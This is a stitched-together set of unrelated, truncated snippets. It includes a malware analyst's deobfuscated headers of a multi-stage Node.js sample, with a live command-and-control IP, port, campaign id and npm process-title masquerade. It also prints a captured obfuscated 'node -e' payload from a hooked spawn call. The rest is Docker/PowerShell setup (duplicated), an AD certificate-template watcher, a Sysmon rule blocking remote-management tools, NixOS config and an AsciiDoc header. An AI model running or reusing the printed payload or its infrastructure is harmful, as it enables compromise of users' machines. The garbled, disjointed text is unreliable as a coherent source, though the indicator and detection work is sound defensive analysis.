Pull docker image
docker pull mcr.microsoft.com/powershell:latest
Run container
docker run -it --rm mcr.microsoft.com/powershell:latest
Install the PSWSMan module
Install-Module -Name PSWSMan
Import-Module PSWSMan
// SLOP deobfuscation
// Deobfuscated header of one stage of the sample. Statements are kept byte-for-byte
// so the literals below stay usable as detection artifacts.
const { execSync } = require('child_process');
const os = require('os');
const axios = require('axios');
// Sets the process title to an npm-looking name; this is what process listings show.
// The ".log" suffix on a process title is itself a cheap hunting pivot.
process.title = 'npm-compiler.log';
// Hard-coded remote host — presumably the command-and-control endpoint; confirm against
// the rest of the sample. Treat as a network indicator.
const server = '216.126.237.71';
// Static identifier; the same value recurs in the other stages on this page
// (likely a build or campaign id — verify).
const uid = 'a36adbc35e69b22acbf9f834a0deb286';
// Meaning not visible in this fragment; the same literal reappears in the later stages.
const t = '8';
// SLOP deobfuscation
// Deobfuscated header of a second stage. Kept byte-for-byte as an analysis artifact.
const fs = require('fs');
const path = require('path');
const os = require('os');
// form-data together with axios suggests multipart uploads later in the sample
// (presumably collection/exfiltration) — not visible in this fragment, confirm.
const FormData = require('form-data');
const axios = require('axios');
// Both sync and async command execution are pulled in; what is executed is not shown here.
const { execSync, exec } = require('child_process');
// Same npm-style process-title masquerade as the other stages, without the ".log" suffix.
process.title = 'npm-compiler';
// SLOP deobfuscation
// Deobfuscated header of a third stage (matches the constants recovered from the
// hooked child_process.spawn payload further down this page). Kept byte-for-byte.
const axios = require('axios');
const os = require('os');
const fs = require('fs');
// This stage additionally imports spawn; the hooked spawn log below shows it launching
// "node -e" with an obfuscated script.
const { execSync, exec, spawn } = require('child_process');
// Same static identifier as the other stages — likely a build or campaign id, verify.
const uid = 'a36adbc35e69b22acbf9f834a0deb286';
// Same hard-coded host as stage 1; presumably the command-and-control endpoint. Network indicator.
const m = '216.126.237.71';
// Presumably a TCP port used with m — confirm in the connection code (not shown here).
const p = '4801';
// Meaning not visible in this fragment.
const t = '8';
| [HOOKED] child_process.spawn called with: | |
| [ | |
| "node", | |
| [ | |
| "-e", | |
| "\n const F=b;(function(c,d){const E=b,e=c();while(!![]){try{const f=-parseInt(E(0x1fd))/(-0x1b33+0x71*0x31+0x593)*(-parseInt(E(0x1c8))/(-0x20c2+0x147a+0xc4a*0x1))+-parseInt(E(0x202))/(0x156f+-0x2d4+0x1*-0x1298)+-parseInt(E(0x235))/(0x26bc+0xe8+-0x20*0x13d)*(-parseInt(E(0x22b))/(-0x2707+0x1719+0xff3))+parseInt(E(0x1dc))/(0x1*0x263+0x1*0x2550+-0x27ad*0x1)*(parseInt(E(0x228))/(0xdcd*-0x2+0x1*0x1e51+-0x2b0))+-parseInt(E(0x21d))/(-0x13*0x58+-0x1f6*0x11+0x27e6)+-parseInt(E(0x1a3))/(0x14e+-0x5ce*0x4+0x1*0x15f3)+parseInt(E(0x191))/(0x923+0x239*-0xb+0x7ad*0x2);if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0x1d16+0x5*0x3bd8+-0x7b*-0x38f));const axios=require(F(0x16c)),os=require('os'),fs=require('fs'),{execSync,exec,spawn}=require(F(0x1de)),uid=F(0x1ec),m=F(0x1e8),p=F(0x213),t='8';function b(c,d){c=c-(0xb97*0x1+0x117f+-0x1bac);const e=a();let f=e[c];return f;}function a(){const a1=['npm\\x20install\\x20socket. |
# Setup portion of a script that watches the AD certificate-templates container;
# the poll loop itself is not in this fragment.
# NOTE(review): System.DirectoryServices.Protocols is loaded but not used in the lines shown — confirm it is needed further down.
Add-Type -AssemblyName System.DirectoryServices.Protocols
Add-Type -AssemblyName System.DirectoryServices
# Presumably consumed by a polling loop later in the script.
$pollIntervalSeconds = 5
# Resolve a domain controller for the caller's current domain.
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$dc = $domain.FindDomainController().Name
# Bind with LDAPS:// rather than LDAP:// so the directory traffic is TLS-protected;
# the DC's certificate must chain to a root the client trusts or this bind fails.
$rootDSE = New-Object System.DirectoryServices.DirectoryEntry("LDAPS://$dc/RootDSE")
$configNC = $rootDSE.configurationNamingContext
# Certificate templates live under the Configuration naming context, i.e. this base is forest-wide.
$baseDN = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"
| <Sysmon schemaversion="4.82"> | |
| <EventFiltering> | |
| <RuleGroup name="" groupRelation="or"> | |
| <FileBlockExecutable onmatch="include"> | |
| <!-- List used: https://github.com/0x706972686f/RMM-Catalogue/tree/main --> | |
| <TargetFilename name="RMM Software" condition="end with">rpcgrab.exe</TargetFilename> | |
| <TargetFilename name="RMM Software" condition="end with">rpcsetup.exe</TargetFilename> | |
| <TargetFilename name="RMM Software" condition="end with">action1_agent.exe</TargetFilename> | |
| <TargetFilename name="RMM Software" condition="end with">aeroadmin.exe</TargetFilename> | |
| <TargetFilename name="RMM Software" condition="end with">alitask.exe</TargetFilename> |
Pull docker image
docker pull mcr.microsoft.com/powershell:latest
Run container
docker run -it --rm mcr.microsoft.com/powershell:latest
Install the PSWSMan module
Install-Module -Name PSWSMan
Import-Module PSWSMan
# rtkit for pipewire
security.rtkit.enable = true;
# enable pipewire with wlr support
services.pipewire.enable = true;
xdg = {
portal = {
enable = true;
extraPortals = with pkgs; [
// https://security.microsoft.com/apiproxy/mtp/huntingService/queries/encode
Advanced hunting uses this endpoint to encode a query for sharing.
The encoded query can then be opened through https://security.microsoft.com/v2/advanced-hunting?query={add query here}&timeRangeId=week
| = Title: Subtitle | |
| Firstname Lastname <firstname.lastname@domain.com> | |
| :doctype: pdf | |
| :author: firstname lastname | |
| :subtitle: subtitle | |
| :ntitle: title: {subtitle} | |
| :imagesdir: ./images | |
| :class: classname | |
| :pdf-stylesdir: /template/resources/themes | |
| :pdf-fontsdir: /template/resources/fonts |